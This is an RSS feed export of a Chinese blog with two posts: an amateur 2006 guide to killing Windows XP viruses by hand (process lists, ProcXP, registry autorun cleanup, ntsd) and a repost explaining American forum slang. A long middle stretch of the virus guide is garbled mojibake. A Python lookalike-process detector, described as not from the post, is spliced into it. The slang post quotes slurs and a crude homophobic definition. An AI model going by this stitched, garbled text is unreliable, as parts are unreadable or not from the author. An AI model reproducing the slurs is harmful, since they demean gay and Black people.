<?xml version="1.0" encoding="utf-8" standalone="yes"?> http://m.shnenglu.com/asp/category/2612.html See, I'm living... zh-cn Tue, 20 May 2008 16:56:49 GMT Tue, 20 May 2008 16:56:49 GMT 60 A brief talk on manual virus removal</title><link>http://m.shnenglu.com/asp/archive/2006/11/26/15679.html</link><dc:creator>Asp</dc:creator><author>Asp</author><pubDate>Sun, 26 Nov 2006 10:57:00 GMT</pubDate><guid>http://m.shnenglu.com/asp/archive/2006/11/26/15679.html</guid><wfw:comment>http://m.shnenglu.com/asp/comments/15679.html</wfw:comment><comments>http://m.shnenglu.com/asp/archive/2006/11/26/15679.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://m.shnenglu.com/asp/comments/commentRss/15679.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/asp/services/trackbacks/15679.html</trackback:ping><description><![CDATA[ <p> <font size="2">This article is a bit long; please come in and read...<br />Everything below is based on Windows XP.<br />It seems that many people's computers are infected with viruses these days, which is miserable; I am a computer newbie myself and was tormented by viruses for a while, so I am writing this article in the hope that it helps those who are still being tormented by low-grade viruses, heh...<br />PS: because right now I can only kill low-grade viruses myself...<br />We all know that for a program to run it must be loaded into memory, and once it is loaded the program becomes a process. A so-called system process is nothing more than a program the operating system needs to load in order to run. A virus is no different: to run, it is also loaded into memory and becomes a process. So once we know our processes well, we already have the basic knowledge needed for manual virus removal...<br />First, press Ctrl+Alt+Del to open Task Manager and click the Processes tab; the list at the bottom shows a dozen or even several dozen processes. You will spot some familiar names, such as iexplore.exe (Internet Explorer's process name), eMule.exe (eMule's process name) and QQ.exe (QQ's process name), so we can roughly guess that a process name usually matches the program name, though there are exceptions.<br />So to learn manual removal you must first know these process names, especially the system processes, otherwise all sorts of odd problems will appear... heh...<br />Below are the common system processes I can recall for now; the real number is of course far larger. Look up any you do not recognize online, or ask on Baidu Zhidao:<br />
alg.exe Windows network connection sharing and network connection firewall<br />cmd.exe Command line<br />conime.exe Input method editor related program<br />csrss.exe Subsystem server process<br />ctfmon.exe Microsoft Office language bar<br />explorer.exe Explorer (resource manager)<br />internat.exe The pinyin icon in the tray (note: internat, not internet)<br />llssrv.exe License logging service<br />lsass.exe Manages IP security policy and starts the IKE and IP security driver<br />mstask.exe Scheduled tasks<br />nvsvc32.exe NVIDIA display card related program<br />point32.exe Microsoft's mouse driver<br />regsvc.exe Remote registry operations; runs when the remoteregister system service is enabled<br />services.exe Contains many system services<br />smss.exe session manager<br />spoolsv.exe Print spooler<br />svchost.exe Windows 2000/XP file protection system<br />system Windows System Process<br />system idle process Shows the percentage of available CPU resources.<br />tftpd.exe Implements the tftp internet standard, which requires no username or password.<br />taskmgr.exe Task Manager<br />userinit.exe Manages the different startup sequences; exits after the user has been loaded<br />wdfmgr.exe A system service, the Windows user mode driver framework, added by installing Windows Media Player 10 to reduce compatibility problems.<br />winlogon.exe Manages user logon<br />wmiexe.exe Windows Management Instrumentation, the Windows management program<br />wmiprvse.exe Part of Windows; handles WMI operations through the WinMgmt.exe program<br />wuauclt.exe Windows automatic update manager<br />A bit dizzy? That's normal; look at it a few more times and you'll get used to it.<br />
Next, think about a virus's habits: it loads into memory, copies and spreads itself, infects files, has a certain ability to protect itself, and can come back under certain conditions. So the thinking behind manual removal should be: first end the virus's process, then find and delete the files related to the virus, then delete the startup entries and services related to it; if they cannot be deleted, reboot into Safe Mode or even DOS (the Recovery Console) and delete them there.<br />By the way, let me introduce a few tools:<br />One is the process analysis tool ProcXP (Process Explorer); its process management is very low-level. To test its power, run it and end system: the result is that your machine reboots, because it has ended Windows itself, heh...<br /></font> <a href="/Files/asp/ProcessExplorer.rar"> <font size="2">http://m.shnenglu.com/Files/asp/ProcessExplorer.rar</font> </a> <br /> <font size="2">The second tool is the file association restorer; since many viruses now hook themselves into application associations, this tool is very effective when cleaning.<br /></font> <a href="/Files/asp/recover.rar"> <font size="2">http://m.shnenglu.com/Files/asp/recover.rar</font> </a> <br /> <font size="2">The third tool is IceSword, which can observe almost everything in the system, delete some particularly stubborn files, and end processes; in my own tests, though, its privilege for ending programs did not seem as high as ProcXP's.<br /></font> <a href="/Files/asp/icesword_cn.rar"> <font size="2">http://m.shnenglu.com/Files/asp/icesword_cn.rar</font> </a> <br /> <font size="2">Next, let's learn how to check for and delete viruses.<br />First, check whether your computer behaves abnormally: for example, on boot something like "temp1 performed an illegal operation" appears; it is unbelievably slow; or after plugging in someone's USB stick, a few extra files show up on it. If so, congratulations, you are infected.<br />Run the file association restorer, tick "make the registry editor available", click start repair, then close it.<br />Open ProcXP; the first time it shows a prompt, just choose Yes. Then you see its interface, like this:<br /><img src="http://m.shnenglu.com/images/cppblog_com/asp/2860/r_KillVirus1.jpg" /><br />It has several columns:<br />The first, Process: the process name and its parent/child relationships.<br />The second, PID: the process's unique ID in the system, the Process ID.<br />The third, CPU: CPU usage.<br />The fourth, Description: a description of the program.<br />
絎簲鏍廋ompany Name錛屽巶瀹跺悕銆?br />聽(tīng)聽(tīng)聽(tīng) 鍙﹀鎶婇紶鏍囧仠鍦ㄤ竴涓繘紼嬩笂涓浼?xì)鍎垮Q屾垨鑰呭湪涓婇潰鐐瑰彸閿紝鐐筽roperties錛屽氨鍙互鏄劇ず鍑?guó)櫩欎釜杩浗E嬪搴旂殑紼嬪簭鏄粈涔堝拰榪欎釜紼嬪簭鍔犺澆浜?jiǎn)浠涔堛?br />聽(tīng)聽(tīng)聽(tīng) 鐒跺悗灝辨槸鐪嬩綘鐨勭粡楠屼簡(jiǎn)錛屾壘鍑洪偅浜涘緢濂囨殑榪涚▼鍚э紝鏆傛椂鎴戠敤鐨勫垽瀹氭柟娉曟湁錛?br />聽(tīng)聽(tīng)聽(tīng) 1銆伮?tīng)缁忛獙锛岃寰楃梾姣掋傦紙鍛靛懙錛岀瓑浜庢病鏈夎錛?br />聽(tīng)聽(tīng)聽(tīng) 2銆伮?tīng)涓浜涗吉瑁呰嚜宸辯殑榪涚▼鎴栬呮枃浠跺悕錛歊undl132.exe銆丷undll.exe錛堜吉瑁匯undll32.exe錛夈乻cchost.exe銆乻cvhost.exe銆乻vchost..exe銆乻vchost32.exe銆乻vch0st.exe錛堜吉瑁卻vchost.exe錛夌瓑絳夈?br />聽(tīng)聽(tīng)聽(tīng) 3銆伮?tīng)涓浜涘拰緋葷粺榪涚▼鍚嶅瓧涓鏍鳳紝浣嗘槸璺緞涓嶄竴鏍風(fēng)殑錛屾瘮濡俢:\windows\svchost.exe錛岃岀郴緇熸枃浠剁殑璺緞鏄細(xì)c:\windows\system32\svchost.exe絳夈?br />聽(tīng)聽(tīng)聽(tīng) 4銆伮?tīng)涓浜涚湅鐫鍚嶅瓧灝變笉欏虹溂鐨勶細(xì)sex.exe絳夈?br />聽(tīng)聽(tīng)聽(tīng) 5銆伮?tīng)涓浜涘緢濂囩壒鐨勫悕瀛楋細(xì)123.exe銆乼emp1.exe銆乼emp2.exe銆乻xs.exe銆乹wer.exe銆乤sdf.exe銆乺un.dll絳夌瓑銆?br />聽(tīng)聽(tīng)聽(tīng) 6銆伮?tīng)涓浜涘悕瀛楀拰鎻忚堪涓嶇鍚堢殑榪涚▼錛屾瘮濡俁undll32.exe鎻忚堪鍙樻垚浜?jiǎn)MS Rundll錛岃屼笉鏄疪un a Dll as an App銆?br />聽(tīng)聽(tīng)聽(tīng) 7銆伮?tīng)鐢≧undll鎵撳紑鐨勭▼搴忥紝涓鑸潵璇翠笉鏄祦姘撹蔣浠訛紝灝辨槸鏈ㄩ┈錛屽懙鍛碉紝鏆傛椂緇欐垜鐨勬劅瑙夊氨鏄繖鏍鳳紝褰撶劧涔熸湁渚嬪銆傝繖灝辮鑷繁鍘籔rocXP閲岀殑Properties閲岄潰鐪嬩簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 8銆伮?tīng)涓浜涗細(xì)鍔ㄤ笉鍔ㄥ氨浼?xì)鑷繁澶嶅埗鎴愬嚑涓殑杩浗E嬶紝濡俿tup.exe銆?br />聽(tīng)聽(tīng)聽(tīng) 9銆伮?tīng)鏈笉搴旇瀛樺湪鐨剺q涚▼錛岀幇鍦ㄥ瓨鍦ㄤ簡(jiǎn)錛屾瘮濡傝涓浜涢潪緋葷粺榪涚▼錛屽父瑙佷簬涓浜涙祦姘撹蔣浠訛紝姣斿錛歛ssisstant.exe錛?721錛夛紝YLive.exe錛堥泤铏庡姪鎵嬶級(jí)<br />聽(tīng)聽(tīng)聽(tīng) 紜畾濂界洰鏍囦箣鍚庡氨瑕佸紑濮嬫壘鐥呮瘨鏂囦歡浜?jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 浠繪剰鎵撳紑涓涓枃浠跺す錛岀偣閫夊伐鍏鳳紝鏂囦歡澶歸夐」錛屾煡鐪嬨傛妸涓嬮潰鍒楄〃閲岀殑闅愯棌鍙椾繚鎶ょ殑緋葷粺鏂囦歡錛堟帹鑽愶級(jí)鍜岄殣钘忓凡鐭ユ枃浠剁被鍨嬬殑鎵╁睍鍚嶅墠闈㈢殑鍕劇偣鎺夛紝鍐嶉変笂鏄劇ず鎵鏈夋枃浠跺拰鏂囦歡澶癸紝榪欐牱鐥呮瘨灝辨棤澶勮棌韜簡(jiǎn)銆備絾鏄湁鏃跺欒繖縐嶆柟娉曚細(xì)鏃犳晥錛岄殣钘忕殑鏂囦歡鐓ф牱闅愯棌錛屾瘮濡俁ose鐥呮瘨鐨勪竴涓彉縐嶃傝В鍐蟲(chóng)柟娉曟槸寮濮?銆夎繍琛?銆塺egedit錛屾墦寮娉ㄥ唽琛ㄧ紪杈戝櫒錛屽埌涓婚敭錛堝嵆閲岄潰鍍忔枃浠跺す鐨勪笢瑗匡級(jí)HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/explorer / Advanced/Folder/Hidden/SHOWALL涓嬮潰錛屾妸鍙寵竟鍒楄〃閲岄潰鐨凜heckedValue鍒犻櫎錛屾病鏈夌殑璇濅篃濂斤紝鐒跺悗鏂板緩涓涓狣WORD鍊鹼紝騫惰瀹氳鍊間負(fù)1錛屽啀鍒版枃浠跺す閫夐」閲岄潰錛屽氨鍙互鏀逛簡(jiǎn)銆?br 
/>濂界殑錛岀幇鍦ㄦ樉紺轟簡(jiǎn)鎵鏈夌殑鏂囦歡錛岀梾姣掑湪鍝噷錛烶rocXP閲岄潰涓嶆槸鏈夊啓紼嬪簭鐨勪綅緗悧錛岃涓嬬梾姣掔殑浣嶇疆錛岀粨鏉熺梾姣掔殑榪涚▼錛屽幓鍚э紝浣嗘槸娉ㄦ剰錛岃繖閲屾湁鍑犱釜娉ㄦ剰浜嬮」錛?br />聽(tīng)聽(tīng)聽(tīng) 絎竴錛岃繘鍏ョ鐩樺拰鏂囦歡澶圭殑鏃跺欎笉瑕佺洿鎺ュ弻鍑伙紝鑰岃鐐瑰彸閿紝閫夋墦寮錛屼笉鐒剁殑璇濊嚜鍔ㄦ挱鏀句細(xì)鎶婇儴鍒嗙梾姣掑張嬋媧葷殑銆?br />聽(tīng)聽(tīng)聽(tīng) 絎簩錛屽鏋滄槸c:\windows\system32\rundll32.exe鐨勮瘽錛岄偅鎵劇殑鏂囦歡搴旇鏄痳undll32.exe鍚庨潰鐨勫姞杞介」錛宺undll32.exe鏄棤杈滅殑銆?br />鎵懼埌鐥呮瘨鏂囦歡鍚庯紝鍒犲惂錛屽悗緙鍚嶄負(fù).exe鐨勬枃浠朵竴鑸氨鍒犱簡(jiǎn)錛屼絾鏄鏋滄槸鍚庣紑鍚嶄負(fù).dll鐨勬枃浠訛紝鏈夋椂榪樻槸鍒犱笉鎺夌殑錛屾庝箞鍔烇紵<br />聽(tīng)聽(tīng)聽(tīng) 鎵撳紑ProcXP錛岀偣鑿滃崟鏍忛噷鐨凢ind錛岄塅ind Dlls錛岃緭鍏ヤ綘瑕佸垹鐨刣ll鍚嶏紝鐐筍earch錛屽鏋滆繖涓枃浠惰搴曚笅璋冪敤錛屽氨浼?xì)鏄窘C哄湪搴曚笅鐨勫垪琛ㄦ涓紝鍐嶄竴涓釜鐨勬壘榪欏嚑涓猟ll鎵鍦ㄧ殑榪涚▼錛屾妸榪欏嚑涓繘紼嬬粨鏉熸帀錛屽氨鍙互鍒犻櫎浜?jiǎn)銆?br />鍒犻櫎浜?jiǎn)鐥呮瘨浣撳Q屾垜浠繕瑕佸仛涓鐐規(guī)畫(huà)浣欏伐浣溿?br />聽(tīng)聽(tīng)聽(tīng) 鍐嶆榪愯鏂囦歡鍏寵仈鎭㈠鍣紝鎶娾滀嬌娉ㄥ唽琛ㄧ紪杈戝櫒鍙敤鈥濋変笂錛岀偣寮濮嬩慨澶嶏紝鐒跺悗鍏蟲(chóng)帀瀹冨惂錛屽畠宸茬粡娌℃湁鍒╃敤浠峰間簡(jiǎn)錛屽懙鍛碉紙濂芥畫(huà)蹇嶅摝錛夈?br />聽(tīng)聽(tīng)聽(tīng) 姣斿錛岀梾姣掑鍒剁殑紓佺洏鐨勮嚜鍔ㄦ挱鏀撅紝鏈钁楀悕鐨勫rose鐥呮瘨鐨勪竴涓彉縐嶏紝鍦ㄦ瘡涓洏?shù)笅闈㈤兘浼?xì)寤虹珛鏂囦歡錛宑opy.exe銆乭ost.exe鍜宎utorun.ini錛屽綋鐒跺垽瀹氱殑渚濇嵁鏄痑utorun.ini閲岄潰鐨勫唴瀹癸紝閲岄潰搴旇鏈塧utorun=錛岃繖涓悗闈㈢殑鍐呭灝辨槸鐥呮瘨鐨勪綅緗紝鎵懼埌騫跺垹鎺夊惂錛屽拰autorun.ini涓璧峰垹鎺変箣鍚庯紝浣犱細(xì)鍙戠幇鑷姩鎾斁榪樺湪閭i噷錛屽茍娌℃湁鍒犻櫎錛岃繖鏄洜涓哄湪娉ㄥ唽琛ㄩ噷闈㈣繕鏈夋畫(huà)浣欑殑鍘熷洜錛岃繕璁板緱autorun=鍚庨潰鐨勫唴瀹瑰悧錛熻繍琛宺egedit錛岃繘鍏ユ敞鍐岃〃錛岃繘鍏ヤ富閿細(xì)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2錛屽湪閲岄潰鎼滅儲(chǔ)autorun=鍚庨潰鐨勫唴瀹癸紝鍗砪opy.exe錛屾妸鎵懼埌鐨勯」鎵瀵瑰簲鐨勫湪HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2涓嬬殑涓婚敭鏁翠釜鍒犳帀錛屽嵆鍙傛敞鎰忓彲鑳芥湁寰堝涓紝鍏ㄩ儴瑕佸垹鍝︺傚垹瀹屼箣鍚庯紝鑷姩鎾斁灝辨病鏈変簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 鍙﹀錛岃繕鏈夌梾姣掔殑鍚姩欏癸紝榪愯msconfig錛岄夊惎鍔紝鍦ㄥ垪琛ㄦ閲岄潰鍙堝緢澶氱殑鍚姩欏癸紝鐪嬬湅鍛戒護(hù)鏍忛噷闈㈡湁娌℃湁鐥呮瘨鏂囦歡鐨勮礬寰勶紝鏈夌殑灝卞叏閮ㄥ嬀鎺夛紝紜畾銆?br />聽(tīng)聽(tīng)聽(tīng) 鍦ㄥ彸閿偣鎴戠殑鐢?shù)鑴戝Q岄夌鐞嗐傜偣鏈嶅姟鍜屽簲鐢ㄧ▼搴忥紝鐐規(guī)湇鍔★紝鍦ㄥ彸杈圭殑鍒楄〃閲岄潰涓涓竴涓‘瀹氭湁娌℃湁鏈嶅姟璋冪敤鐥呮瘨錛屾湁灝辯鐢ㄦ帀銆傦紙浠涔堬紵鐪嬩笉鎳傦紵閭e氨鐐瑰彸閿紝灞炴э紝榪涘幓鐪嬫拻鈥︹︼級(jí)<br />聽(tīng)聽(tīng)聽(tīng) 濡傛灉涓婇潰鐨勬柟娉曚笉琛岀殑璇濓紝灝卞幓瀹夊叏妯″紡搴曚笅鐢ㄥ惂錛岄偅浜涘伐鍏峰湪瀹夊叏妯″紡涓嬩篃鍙互鐢ㄧ殑銆?br />聽(tīng)聽(tīng)聽(tīng) OK錛岃繖鏍鳳紝涓鑸殑鐥呮瘨涔熷氨鍩烘湰涓婃悶瀹氫簡(jiǎn)銆?D鈥︹?br />聽(tīng)聽(tīng)聽(tīng) 
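Criteria 2 and 3 above (lookalike names such as svch0st.exe, and a system process name running from the wrong directory) can be checked mechanically. The following Python is an added example, not code from the post or from Process Explorer; the table of expected directories and the sample process records are constructed for it.

```python
"""Heuristic check for disguised process names (added example, not from the post).

It applies the post's criteria 2 and 3: names that imitate a Windows system
process (svch0st.exe, scvhost.exe, Rundl132.exe ...) and system-process names
running outside their expected directory (c:\\windows\\svchost.exe instead of
c:\\windows\\system32\\svchost.exe). On a real machine you would feed it the
name/path pairs shown by Task Manager or Process Explorer.
"""
from dataclasses import dataclass
from typing import Optional

# Legitimate Windows XP system process names and the directory each is expected
# to run from (assumption for the example; based on the post's process list).
SYSTEM_PROCESSES = {
    "svchost.exe":  r"c:\windows\system32",
    "rundll32.exe": r"c:\windows\system32",
    "lsass.exe":    r"c:\windows\system32",
    "csrss.exe":    r"c:\windows\system32",
    "smss.exe":     r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}

# Digit-for-letter substitutions commonly used in lookalike names (svch0st, Rundl132).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "5": "s"})


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a small value means a near miss of a known name."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


@dataclass
class Finding:
    name: str
    path: str
    reason: str


def check_process(name: str, path: str) -> Optional[Finding]:
    """Return a Finding if (name, path) looks like a disguised process, else None."""
    lname = name.lower()
    ldir = path.lower().rsplit("\\", 1)[0]
    if lname in SYSTEM_PROCESSES:
        # Criterion 3: right name, wrong directory.
        expected = SYSTEM_PROCESSES[lname]
        if ldir != expected:
            return Finding(name, path, f"system name outside {expected}")
        return None
    # Criterion 2: undo digit swaps and doubled dots, then compare the stem
    # (name without extension) against every known system process stem.
    normalised = lname.translate(HOMOGLYPHS).replace("..", ".")
    stem = normalised.rsplit(".", 1)[0]
    for known in SYSTEM_PROCESSES:
        kstem = known.rsplit(".", 1)[0]
        if stem == kstem or stem.startswith(kstem) or edit_distance(stem, kstem) <= 2:
            return Finding(name, path, f"name imitates {known}")
    return None


def scan(processes):
    """Run check_process over (name, path) pairs and return the findings."""
    return [f for f in (check_process(n, p) for n, p in processes) if f]


# Constructed sample: the lookalikes named in the post plus clean entries.
SAMPLE = [
    ("svchost.exe", r"C:\WINDOWS\system32\svchost.exe"),
    ("svchost.exe", r"C:\WINDOWS\svchost.exe"),
    ("svch0st.exe", r"C:\WINDOWS\system32\svch0st.exe"),
    ("scvhost.exe", r"C:\WINDOWS\scvhost.exe"),
    ("svchost32.exe", r"C:\WINDOWS\svchost32.exe"),
    ("Rundl132.exe", r"C:\WINDOWS\Rundl132.exe"),
    ("explorer.exe", r"C:\WINDOWS\explorer.exe"),
    ("notepad.exe", r"C:\WINDOWS\system32\notepad.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"{f.name:15} {f.path:40} {f.reason}")
```

The edit-distance threshold is deliberately loose; treat a hit as a reason to inspect the process's Properties, not as proof of infection.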
By the way, the method above only guarantees that the virus cannot run; it does not necessarily remove the virus completely, because it is a basically generic method rather than a special method for each individual virus, so please bear with me.<br />Also, the method above only works for ordinary, relatively benign viruses. If the virus is nastier, for example one that infects exe files rather than binding itself to file associations, then manual removal is impossible; I do not mean it cannot be removed by hand with this method, I mean it cannot be removed by hand at all. You would have to remove the virus from each application one by one and fix the program's entry point, which might mean editing thousands of files by hand. Suppose you handle one file in 2 minutes and have 1000 files to fix: that still takes you 33.33 hours. But if you are interested, study the structure of Windows PE files and how file splitting works; you will learn a lot, for example why antivirus software sometimes wrecks applications while cleaning them, how packing and unpacking work, how BindFile works and how the kind of FileBind that does not increase the file size works, and so on.<br />Well, I called this a brief talk and ended up saying this much; it feels shallow, but I hope everyone likes it and we can improve together.</font> </p> <p> <font size="2">PS:<br />If you do not have ProcXP, you can use the method below; work out the details yourself, I will not go into them.<br />The following is reposted from Baidu Zhidao:<br />Open Explorer and go to Control Panel → Administrative Tools → Services; perhaps you can find the process you want to KILL there. <br />Besides tools like PROCXP, you can also use several tools built into Windows 2000 and later. <br />ntsd -c q -p PID <br />In Windows, only System, SMSS.EXE and CSRSS.EXE cannot be killed. The first two are purely kernel-mode; the last is the Win32 subsystem, which ntsd itself needs. ntsd has shipped with the system as a user-mode debugging tool since Windows 2000. A process the debugger attaches to exits together with the debugger, so it can be used to terminate processes from the command line. Using ntsd automatically grants debug privilege, so most processes can be killed. ntsd opens a new debugger window, which normally cannot be controlled from a pure command line, but a simple command such as quit (q) can be passed on the command line with the -c parameter. Ntsd is by convention also provided to software developers; only system developers use this command. For details, see the help file shipped with NTSD. Usage: open a cmd.exe window and type:<br />ntsd -c q -p PID <br />There are also tasklist, tskill or taskkill. tasklist lists all processes with their details. tskill finds and kills a process, with a very simple syntax: tskill programname</font> </p> <img src ="http://m.shnenglu.com/asp/aggbug/15679.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/asp/" target="_blank">Asp</a> 2006-11-26 18:57 <a 
href="http://m.shnenglu.com/asp/archive/2006/11/26/15679.html#Feedback" target="_blank" style="text-decoration:none;">Post a comment</a></div>]]></description></item><item><title>A short talk on American forum slang http://m.shnenglu.com/asp/archive/2006/10/31/14454.html Asp Asp Tue, 31 Oct 2006 15:35:00 GMT http://m.shnenglu.com/asp/archive/2006/10/31/14454.html http://m.shnenglu.com/asp/comments/14454.html http://m.shnenglu.com/asp/archive/2006/10/31/14454.html#Feedback 5 http://m.shnenglu.com/asp/comments/commentRss/14454.html http://m.shnenglu.com/asp/services/trackbacks/14454.html The following is a repost; the article's source: <a >http://www.playes.net/Blog/425.asp

First, a great site: http://www.urbandictionary.com/ Generally speaking, if you come across a word you don't understand while browsing forums, look it up there; you can't go wrong.

First we must understand one thing: Americans are lazy, we are lazy too, but we are not yet as lazy as Americans. Anyone who has played a lot of games knows that many games, famous or not, are referred to by their initials. If you know nothing about a game or have just started playing it, you may not even understand what people are saying when they discuss it... So, here goes:

PART 1. Abbreviations

The most common abbreviation is naturally Wtf, What the fxxk, roughly "what the hell is going on". Derivatives include Wth and wtfh: the former is what the hell, the latter what the fxxking hell.

lol is also one of the most common abbreviations. Unfortunately, an American magazine explained it as Lots of Love. After angrily cursing them as noobs, I had to accept the fact that some American parents, having read that magazine, write "lol" on the gifts they give their children... Anyway, the word means Laugh out loud: laughing loudly.

Omg, the classic abbreviation: Oh my god! Omfg: the F-word has become a pure intensifier here, Oh my fxxking God. OMFGBBQ: BBQ is also an intensifier; this word comes up again later, and it is fun. ZOMG: the Z has no meaning at all and just adds emphasis; this one also comes up later.

Lmao, Rofl. These two mean roughly the same. The former is Laugh my ass off, laughing my XX off. The latter is Roll on the floor laughing. ROFL is really the same idea as Mop's 233; in fact the improved version of 233 rolls around, which is exactly the same thing.

qft. See, many of us actually use this, but written in English you can't make it out... It is short for Quote for truth, roughly "agreed, quoting in full". Of course, doing that on NGA gets your account banned...

Imo. This looks like Lmao but means something completely different: it is short for In my opinion (oh, so it's this serious, how boring...). In practice this word is usually the start of a forum fight. Its variant Imho, In my humble opinion, carries a strong flavor of "your humble servant sees the matter thus; if you have a better view, do speak up".

Irl. Looks like Url... it really means In real life. It usually has two uses. One is "I lol'd irl": lol sometimes just means "you're funny", more often it is a kind of appreciation, while "I lol'd irl" goes a step further and means "I really laughed". The other is "Hot girl irl": I'm actually a pretty girl~~ America also has plenty of people pretending to be girls online...

FTW. For the win, used to cheer. For example, last year the Pittsburgh Steelers won the football championship, so: Pittsburgh Steelers ftw! An American jerk here insisted the word means Fxxk the world; I said then USA must mean U sucking ass... he wanted to fight me, I got scared and withdrew my view.

Stfu. Shut the fxxk up, the emphatic form of shut up. Some say only losers say it; taking that at face value, it roughly means yelling "shut your damn mouth" in a quarrel and then either starting a fist fight or running off with your face covered.

Brt, BRB, omw. These are rarely used on forums. The first is Be right there; the second is be right back; the third is on my way. Mostly used in games; anyone who plays on Battle.net knows them.

There are many more abbreviations. I'm writing whatever comes to mind and will polish it later... Anyway, let's begin:

Part 2. Pictograms / onomatopoeia

<3. This one puzzled me for a long time... until someone told me. Everyone knows what XD means (look at it sideways); this one works the same way. It means LOVE, like saying "big heart~~" on our forums.

Lawl. This is the phonetic spelling of lol, for emphasis. "aw" in English is pronounced like the usual "o". It represents a pronunciation, not the abbreviation read out letter by letter as L-O-L.

Rawr. Like the previous one, a phonetic variant of Roar. Used either to provoke or to express excitement.

1337. The numeric spelling of Leet. Leet is itself net jargon; covered later.

hax, the phonetic spelling of Hack: "you're using cheats"... It is not limited to cheats; any unfair lead in a competition qualifies.

Phat, the phonetic spelling of fat. FAT usually means something bad; FAT GIRL is an insult to a girl, and she will cry if you say it. But Phat means great, good, in the sense of "there's a lot of it". "Phat loot" in World of Warcraft comes from this.

Woot. Unlike wut, Woot is not a phonetic variant of what. You can read it as wu (second tone) u (fourth tone) u (neutral tone) t. It comes from WOW! loot!, celebrating gear dropping in a dungeon, and because it sounds close to the exclamation "WooHoo" it was simplified to Woot. It is often written with digits as w00t.

:D, :P, these are pictograms too, but everyone knows them, so I'll skip them. Now, onward:

Part 3. Others

Own. This word simply means "to defeat". What kind of defeat? An overwhelming one, total domination. You can use it to say "Grubby played a game of Warcraft with me and beat me". The word is famous because it is so overused that its past participle is often typed "Pwnt". Either a celebrity used it (say, Sister Furong said "Pwnt") or O and P are just too easy to mistype; either way Pwnt became a legitimate usage. You can say "I got pwnt" to compliment your opponent. Ownt and Owned are normal usage too.

Leet. This one gets its own entry. What does it mean? Have you seen someone finish Contra without picking up a single gun or dying once? That person is Leet. It is the net spelling of "Elite". Elite means the elite; leet usually refers to an elite in a game. We could say Luo Wei is a Warcraft leet, but, three words: I don't believe it (skip this sentence if you don't get it). Roughly that.

Emo. An interesting word. There is an American band called EMO that often plays sad songs. So forum regulars use the word for neurotic types, for example people who yell "My life sucks" all day. Such people really exist: a classmate of mine, before lab class, would often hold up a picture book of a prince and a princess and tell me "look how happy they are, I'm so envious, do you think this is real or just a drawing", and so on. Lin Daiyu is of course a standard EMO too. One Urban Dictionary definition of this word is superb; I share it here without translation, read it if you can:

1. Girls say they like "sensitive guys" (lie)
2. Guy finds out, so he listens to faggy emo music and dresses like a dork so chicks will see that he is sensitive and not afraid to express himself (lie). He dyes his hair black, wraps himself in a stupid looking scarf, develops an eating disorder, and rants about how "nobody understands".
3. Now an emo guy, he meets Emo chick and they start dating, talking about how their well-off suburban lifestyles are terrible and depressing (lie)
4. Emo guy is just too much of a pussy. His penis is too small, he's too depressed to bathe, and has more mood swings than emo chick, and he doesn't even have a menstrual cycle. Emo chick dumps him, saying "It's not you, it's me." (lie) as she drives off with Wayne, the school jock and captain of the football team.
5. Emo guy goes home and cries, proceeds to write a weak song and strum a single string on his acoustic guitar. Another emo chick sees how he is so in touch with his feelings, and the cycle continues.

BBQ. A great word. In OMFGBBQ it serves only as emphasis. BBQ usually means Barbeque, as everyone knows, but why does it add emphasis? Because this word stands for countless abbreviations, better be quick, Bitch be quiet and so on, so it came to express contempt for abbreviation: that's what you get for abbreviating everything. Hence it was also given an emphatic meaning (Americans are really good at this kind of association...)

ZOMG. This one also gets its own entry because it has an origin. Why does "ZOMG" exist? Because OMG is usually written in all caps for emphasis. In writing, all caps is extremely rude, but for emphasis you may use it. The problem is that your capitalizing went wrong: caps means pressing "shift", and you were so excited that when you pressed shift and "o" you also hit the z next to the shift key... See, doesn't that express an excitement beyond the ordinary? That is where ZOMG comes from.

Lame. This word cannot be translated into Chinese; I can only give examples. LAME is the proper term for Sister Furong, Xu Chunmei, the great writer Zhang Bin, the great Liu Wei... and a whole series of such figures...

Chuck Norris. This one has to be its own entry. Chuck Norris is extremely Lame. He is a martial artist who starred in a TV series, called something like TEXAS RANGER, playing an American-style hero. Unfortunately the acting was so hammy that it flopped... so some busybody wrote "100 TOP facts about Chuck Norris" online, thoroughly mocking Chuck Norris's martial arts, his swagger and his sexual prowess. It caused a sensation on the American internet and Chuck Norris became famous... he is America's Sister Furong...

Fag/faggot. An insulting term for GAY, used as abuse. You can call a gay man GAY, but you cannot call a gay man FAGGOT. This is like being able to call a black person BLACK MAN but not Negro. Of course, using it to insult a straight person is no problem at all... (but if someone takes it seriously they can still sue you for discrimination against gays~)

Freak/Hack/Darn. These three are listed together; they are the softened/sanitized forms of "Fxxk"/"Hell"/"Damn" respectively. Simply put, a teacher giving a lecture cannot swear, but he wants "Fxxk" for emphasis and rapport, so he uses freak (pronounced /frik/) in place of fxxk. In English, Shit, Hell, Damn, Fuck and Ass are curse/swear words, equivalent to dirty words, and normally not to be said. But America is a crude country and people like saying these words, just as saying "damn it" sometimes no longer means abuse but emphasis. So they substitute similar-sounding words like Freak for them, and the tone is also weaker than with the original word. A similar Chinese usage is a word we use every day: "靠！"

